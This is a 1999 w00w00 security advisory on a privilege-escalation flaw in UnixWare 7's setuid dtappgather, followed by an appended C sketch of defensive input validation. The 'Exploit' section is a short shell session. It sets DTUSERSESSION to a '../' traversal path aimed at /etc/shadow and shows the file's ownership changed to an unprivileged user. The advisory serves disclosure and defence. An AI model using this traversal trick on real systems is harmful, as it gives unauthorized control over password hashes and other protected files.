Subject: [w00giving '99] UnixWare 7's dtappgather

w00w00 Security Development (WSD)

Discovered by: K2 (ktwo@ktwo.ca)

UnixWare 7's dtappgather runs with superuser privileges, but does not
properly check that the file named by $DTUSERSESSION is readable/writable
or owned by the user running it.

---------------------------------------------------------------------------

Exploit:

    rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow
    rain:/usr/dt/bin$ ./dtappgather
    MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File exists
    rain:/usr/dt/bin$ ls -la /etc/shadow
    -r-xr-xr-x 1 ktwo other 358 Oct 26 04:37 /etc/shadow*

---------------------------------------------------------------------------

Patch:

Because SCO doesn't distribute source code for UnixWare, we must
disassemble the binaries and insert bytes.

---------------------------------------------------------------------------

Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and
interrupt

People who deserve hellos: nocarrier, minus, daveg, rosieriv, nny, marc,
and w00god blake
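The missing check described above, sketched as an added example (not part of the original advisory and not dtappgather's code): a privileged helper that takes a session name from the environment, accepts only a single path component, and changes ownership through a file descriptor it has verified. The function names are hypothetical, and the sketch assumes the base directory (/var/dt/appconfig/appmanager in the output above) is root-owned and not writable by users.

```c
/* Added example: hypothetical helper names, not dtappgather's own code. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Accept a single path component only: no '/', no "." or "..", bounded length. */
int session_name_is_safe(const char *name)
{
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len > 255 || strchr(name, '/') != NULL)
        return 0;
    return strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/*
 * Create (or reuse) the per-session directory under base_fd and hand it to uid.
 * Returns an open directory fd, or -1 if the name or the existing object is unsafe.
 */
int open_session_dir(int base_fd, const char *name, uid_t uid)
{
    struct stat st;
    int created, fd;

    if (!session_name_is_safe(name))
        return -1;
    created = (mkdirat(base_fd, name, 0700) == 0);
    /* O_NOFOLLOW refuses a planted symlink; O_DIRECTORY refuses a regular file. */
    fd = openat(base_fd, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode))
        goto fail;
    /* Reuse a pre-existing directory only if the caller already owns it. */
    if (!created && st.st_uid != uid)
        goto fail;
    /* Change ownership through the verified fd, never by re-resolving a path. */
    if (st.st_uid != uid && fchown(fd, uid, (gid_t)-1) != 0)
        goto fail;
    return fd;
fail:
    close(fd);
    return -1;
}
```

With this check the DTUSERSESSION value from the session above is rejected before any mkdir or ownership change happens, because it contains '/' and would resolve outside the base directory.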